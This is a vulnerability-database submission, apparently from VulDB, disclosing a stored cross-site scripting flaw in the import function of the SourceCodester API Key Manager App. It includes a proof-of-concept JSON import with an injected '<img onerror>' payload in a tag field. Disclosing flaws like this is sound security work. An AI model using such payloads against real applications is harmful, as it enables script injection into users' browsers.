| Título | SourceCodester API Key Manager App Using HTML, CSS and JavaScript with Source Code 0 Cross Site Scripting |
|---|
| Descripción | The vulnerability lies in the import keys functionality where any user can define additional tags having JavaSctipt payloads. On load, the payload is executed within the local browser.
[
{
"id": "xss_tag_1",
"name": "Legitimate API Key",
"key": "sk_live_1234567890abcdef",
"category": "payment",
"tags": [
"production",
"<img src=x onerror=alert(1);>", // Exploit
"important"
],
"notes": "This key is used for production payments",
"created": "2026-01-03T17:41:04.147892Z",
"lastUsed": null,
"strength": "Strong"
}
]
Codebase: https://www.sourcecodester.com/javascript/18600/api-key-manager-app-using-html-css-and-javascript-source-code.html |
|---|
| Usuario | Kamran Saifullah (UID 4218) |
|---|
| Sumisión | 2026-01-03 20:40 (hace 3 meses) |
|---|
| Moderación | 2026-01-04 07:47 (11 hours later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 339472 [SourceCodester API Key Manager App 1.0 Import Key secuencias de comandos en sitios cruzados] |
|---|
| Puntos | 17 |
|---|